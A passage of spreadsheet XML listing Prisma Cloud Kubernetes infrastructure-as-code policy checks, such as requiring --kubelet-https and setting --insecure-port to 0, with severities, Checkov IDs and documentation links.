      <c r="U1165" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1165" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1165" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin AlwaysAdmit is not set</t>
        </is>
      </c>
      <c r="X1165" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set</t>
        </is>
      </c>
      <c r="Y1165" t="inlineStr"/>
      <c r="Z1165" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1165" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1165" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1165" t="inlineStr">
        <is>
          <t>CKV_K8S_79</t>
        </is>
      </c>
      <c r="AD1165" t="b">
        <v>1</v>
      </c>
      <c r="AE1165" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1165" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>3762e3bb-a855-4191-a4e3-2fd0aacd146d</t>
        </is>
      </c>
      <c r="AI1165" t="inlineStr"/>
      <c r="AJ1165" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1165" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" t="inlineStr"/>
      <c r="B1166" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1166" s="2" t="inlineStr"/>
      <c r="D1166" t="inlineStr"/>
      <c r="E1166" t="inlineStr"/>
      <c r="F1166" t="inlineStr"/>
      <c r="G1166" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1166" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1166" t="inlineStr">
        <is>
          <t>The --client-cert-auth argument is not set to True</t>
        </is>
      </c>
      <c r="L1166" t="inlineStr"/>
      <c r="M1166" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1166" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1166" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1166" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1166" t="inlineStr"/>
      <c r="R1166" t="inlineStr"/>
      <c r="S1166" t="inlineStr"/>
      <c r="T1166" t="b">
        <v>0</v>
      </c>
      <c r="U1166" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1166" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1166" t="inlineStr">
        <is>
          <t>Ensure that the --client-cert-auth argument is set to true</t>
        </is>
      </c>
      <c r="X1166" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1166" t="inlineStr"/>
      <c r="Z1166" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1166" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1166" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1166" t="inlineStr">
        <is>
          <t>CKV_K8S_117</t>
        </is>
      </c>
      <c r="AD1166" t="b">
        <v>1</v>
      </c>
      <c r="AE1166" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1166" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>9bab9853-71b2-4332-83e0-f191a1775af4</t>
        </is>
      </c>
      <c r="AI1166" t="inlineStr"/>
      <c r="AJ1166" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1166" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" t="inlineStr"/>
      <c r="B1167" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1167" s="2" t="inlineStr"/>
      <c r="D1167" t="inlineStr"/>
      <c r="E1167" t="inlineStr"/>
      <c r="F1167" t="inlineStr"/>
      <c r="G1167" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1167" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1167" t="inlineStr">
        <is>
          <t>The --terminated-pod-gc-threshold argument for controller managers is not set appropriately</t>
        </is>
      </c>
      <c r="L1167" t="inlineStr"/>
      <c r="M1167" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1167" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1167" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1167" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1167" t="inlineStr"/>
      <c r="R1167" t="inlineStr"/>
      <c r="S1167" t="inlineStr"/>
      <c r="T1167" t="b">
        <v>0</v>
      </c>
      <c r="U1167" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1167" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1167" t="inlineStr">
        <is>
          <t>Ensure that the --terminated-pod-gc-threshold argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1167" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1167" t="inlineStr"/>
      <c r="Z1167" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1167" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1167" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1167" t="inlineStr">
        <is>
          <t>CKV_K8S_106</t>
        </is>
      </c>
      <c r="AD1167" t="b">
        <v>1</v>
      </c>
      <c r="AE1167" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1167" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>5572ef68-3823-48f9-b2d0-e17d6d002366</t>
        </is>
      </c>
      <c r="AI1167" t="inlineStr"/>
      <c r="AJ1167" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1167" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" t="inlineStr"/>
      <c r="B1168" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1168" s="2" t="inlineStr"/>
      <c r="D1168" t="inlineStr"/>
      <c r="E1168" t="inlineStr"/>
      <c r="F1168" t="inlineStr"/>
      <c r="G1168" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1168" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1168" t="inlineStr">
        <is>
          <t>The --kubelet-https argument is not set to True</t>
        </is>
      </c>
      <c r="L1168" t="inlineStr"/>
      <c r="M1168" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1168" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1168" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1168" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1168" t="inlineStr"/>
      <c r="R1168" t="inlineStr"/>
      <c r="S1168" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1168" t="b">
        <v>0</v>
      </c>
      <c r="U1168" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1168" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1168" t="inlineStr">
        <is>
          <t>Ensure that the --kubelet-https argument is set to true</t>
        </is>
      </c>
      <c r="X1168" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1168" t="inlineStr"/>
      <c r="Z1168" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1168" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1168" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1168" t="inlineStr">
        <is>
          <t>CKV_K8S_71</t>
        </is>
      </c>
      <c r="AD1168" t="b">
        <v>1</v>
      </c>
      <c r="AE1168" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1168" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>bcfe78a3-ec11-4484-bfd0-b2c18e5839e7</t>
        </is>
      </c>
      <c r="AI1168" t="inlineStr"/>
      <c r="AJ1168" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1168" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" t="inlineStr"/>
      <c r="B1169" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1169" s="2" t="inlineStr"/>
      <c r="D1169" t="inlineStr"/>
      <c r="E1169" t="inlineStr"/>
      <c r="F1169" t="inlineStr"/>
      <c r="G1169" t="b">
        <v>1</v>
      </c>
      <c r="H11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69" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1169" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1169" t="inlineStr">
        <is>
          <t>The --service-account-lookup argument is not set to true</t>
        </is>
      </c>
      <c r="L1169" t="inlineStr"/>
      <c r="M1169" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1169" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1169" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1169" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1169" t="inlineStr"/>
      <c r="R1169" t="inlineStr"/>
      <c r="S1169" t="inlineStr"/>
      <c r="T1169" t="b">
        <v>0</v>
      </c>
      <c r="U1169" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1169" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1169" t="inlineStr">
        <is>
          <t>Ensure that the --service-account-lookup argument is set to true</t>
        </is>
      </c>
      <c r="X1169" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-lookup-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1169" t="inlineStr"/>
      <c r="Z1169" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1169" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1169" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1169" t="inlineStr">
        <is>
          <t>CKV_K8S_96</t>
        </is>
      </c>
      <c r="AD1169" t="b">
        <v>1</v>
      </c>
      <c r="AE1169" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1169" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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69" t="inlineStr">
        <is>
          <t>498e4ff0-b3aa-40b3-a6f3-0e2ca2429322</t>
        </is>
      </c>
      <c r="AI1169" t="inlineStr"/>
      <c r="AJ1169" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1169" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" t="inlineStr"/>
      <c r="B1170" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1170" s="2" t="inlineStr"/>
      <c r="D1170" t="inlineStr"/>
      <c r="E1170" t="inlineStr"/>
      <c r="F1170" t="inlineStr"/>
      <c r="G1170" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1170" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1170" t="inlineStr">
        <is>
          <t>The --client-ca-file argument for API Servers is not set appropriately</t>
        </is>
      </c>
      <c r="L1170" t="inlineStr"/>
      <c r="M1170" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1170" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1170" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1170" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1170" t="inlineStr"/>
      <c r="R1170" t="inlineStr"/>
      <c r="S1170" t="inlineStr"/>
      <c r="T1170" t="b">
        <v>0</v>
      </c>
      <c r="U1170" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1170" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1170" t="inlineStr">
        <is>
          <t>Ensure that the --client-ca-file argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1170" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored</t>
        </is>
      </c>
      <c r="Y1170" t="inlineStr"/>
      <c r="Z1170" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1170" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1170" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1170" t="inlineStr">
        <is>
          <t>CKV_K8S_140</t>
        </is>
      </c>
      <c r="AD1170" t="b">
        <v>1</v>
      </c>
      <c r="AE1170" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1170" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>5afba38b-5dba-4292-80f2-fa901f7b2f6d</t>
        </is>
      </c>
      <c r="AI1170" t="inlineStr"/>
      <c r="AJ1170" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1170" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" t="inlineStr"/>
      <c r="B1171" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1171" s="2" t="inlineStr"/>
      <c r="D1171" t="inlineStr"/>
      <c r="E1171" t="inlineStr"/>
      <c r="F1171" t="inlineStr"/>
      <c r="G1171" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1171" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1171" t="inlineStr">
        <is>
          <t>The RotateKubeletServerCertificate argument for controller managers is not set to True</t>
        </is>
      </c>
      <c r="L1171" t="inlineStr"/>
      <c r="M1171" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1171" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1171" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1171" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1171" t="inlineStr"/>
      <c r="R1171" t="inlineStr"/>
      <c r="S1171" t="inlineStr"/>
      <c r="T1171" t="b">
        <v>0</v>
      </c>
      <c r="U1171" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1171" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1171" t="inlineStr">
        <is>
          <t>Ensure that the RotateKubeletServerCertificate argument is set to true</t>
        </is>
      </c>
      <c r="X1171" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager</t>
        </is>
      </c>
      <c r="Y1171" t="inlineStr"/>
      <c r="Z1171" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1171" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1171" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1171" t="inlineStr">
        <is>
          <t>CKV_K8S_112</t>
        </is>
      </c>
      <c r="AD1171" t="b">
        <v>1</v>
      </c>
      <c r="AE1171" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1171" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>9502fa48-b6f7-42a4-9b06-ac1e5b1bff28</t>
        </is>
      </c>
      <c r="AI1171" t="inlineStr"/>
      <c r="AJ1171" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1171" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" t="inlineStr"/>
      <c r="B1172" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1172" s="2" t="inlineStr"/>
      <c r="D1172" t="inlineStr"/>
      <c r="E1172" t="inlineStr"/>
      <c r="F1172" t="inlineStr"/>
      <c r="G1172" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1172" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1172" t="inlineStr">
        <is>
          <t>The --insecure-bind-address argument is set</t>
        </is>
      </c>
      <c r="L1172" t="inlineStr"/>
      <c r="M1172" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1172" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1172" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1172" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1172" t="inlineStr"/>
      <c r="R1172" t="inlineStr"/>
      <c r="S1172" t="inlineStr"/>
      <c r="T1172" t="b">
        <v>0</v>
      </c>
      <c r="U1172" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1172" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1172" t="inlineStr">
        <is>
          <t>Ensure that the --insecure-bind-address argument is not set</t>
        </is>
      </c>
      <c r="X1172" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set</t>
        </is>
      </c>
      <c r="Y1172" t="inlineStr"/>
      <c r="Z1172" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1172" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1172" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1172" t="inlineStr">
        <is>
          <t>CKV_K8S_86</t>
        </is>
      </c>
      <c r="AD1172" t="b">
        <v>1</v>
      </c>
      <c r="AE1172" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1172" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>ff60f8b9-d509-4765-98ef-44ceb1a85f5e</t>
        </is>
      </c>
      <c r="AI1172" t="inlineStr"/>
      <c r="AJ1172" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1172" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" t="inlineStr"/>
      <c r="B1173" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1173" s="2" t="inlineStr"/>
      <c r="D1173" t="inlineStr"/>
      <c r="E1173" t="inlineStr"/>
      <c r="F1173" t="inlineStr"/>
      <c r="G1173" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1173" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1173" t="inlineStr">
        <is>
          <t>The --read-only-port argument is not set to 0</t>
        </is>
      </c>
      <c r="L1173" t="inlineStr"/>
      <c r="M1173" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1173" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1173" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1173" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1173" t="inlineStr"/>
      <c r="R1173" t="inlineStr"/>
      <c r="S1173" t="inlineStr"/>
      <c r="T1173" t="b">
        <v>0</v>
      </c>
      <c r="U1173" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1173" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1173" t="inlineStr">
        <is>
          <t>Ensure that the --read-only-port argument is set to 0</t>
        </is>
      </c>
      <c r="X1173" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-read-only-port-argument-is-set-to-0</t>
        </is>
      </c>
      <c r="Y1173" t="inlineStr"/>
      <c r="Z1173" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1173" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1173" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1173" t="inlineStr">
        <is>
          <t>CKV_K8S_141</t>
        </is>
      </c>
      <c r="AD1173" t="b">
        <v>1</v>
      </c>
      <c r="AE1173" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1173" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>127c19c7-71ed-4aaa-9786-b2aecb556b83</t>
        </is>
      </c>
      <c r="AI1173" t="inlineStr"/>
      <c r="AJ1173" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1173" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" t="inlineStr"/>
      <c r="B1174" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1174" s="2" t="inlineStr"/>
      <c r="D1174" t="inlineStr"/>
      <c r="E1174" t="inlineStr"/>
      <c r="F1174" t="inlineStr"/>
      <c r="G1174" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1174" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1174" t="inlineStr">
        <is>
          <t>The --cert-file and --key-file arguments are not set appropriately</t>
        </is>
      </c>
      <c r="L1174" t="inlineStr"/>
      <c r="M1174" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1174" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1174" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1174" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1174" t="inlineStr"/>
      <c r="R1174" t="inlineStr"/>
      <c r="S1174" t="inlineStr"/>
      <c r="T1174" t="b">
        <v>0</v>
      </c>
      <c r="U1174" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1174" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1174" t="inlineStr">
        <is>
          <t>Ensure that the --cert-file and --key-file arguments are set as appropriate</t>
        </is>
      </c>
      <c r="X1174" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1174" t="inlineStr"/>
      <c r="Z1174" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1174" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1174" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1174" t="inlineStr">
        <is>
          <t>CKV_K8S_116</t>
        </is>
      </c>
      <c r="AD1174" t="b">
        <v>1</v>
      </c>
      <c r="AE1174" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1174" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>88b22903-9439-48f6-86ad-7f1165d0d70a</t>
        </is>
      </c>
      <c r="AI1174" t="inlineStr"/>
      <c r="AJ1174" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1174" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" t="inlineStr"/>
      <c r="B1175" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1175" s="2" t="inlineStr"/>
      <c r="D1175" t="inlineStr"/>
      <c r="E1175" t="inlineStr"/>
      <c r="F1175" t="inlineStr"/>
      <c r="G1175" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1175" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1175" t="inlineStr">
        <is>
          <t>The --insecure-port argument is not set to 0</t>
        </is>
      </c>
      <c r="L1175" t="inlineStr"/>
      <c r="M1175" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1175" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1175" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1175" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1175" t="inlineStr"/>
      <c r="R1175" t="inlineStr"/>
      <c r="S1175" t="inlineStr"/>
      <c r="T1175" t="b">
        <v>0</v>
      </c>
      <c r="U1175" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1175" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
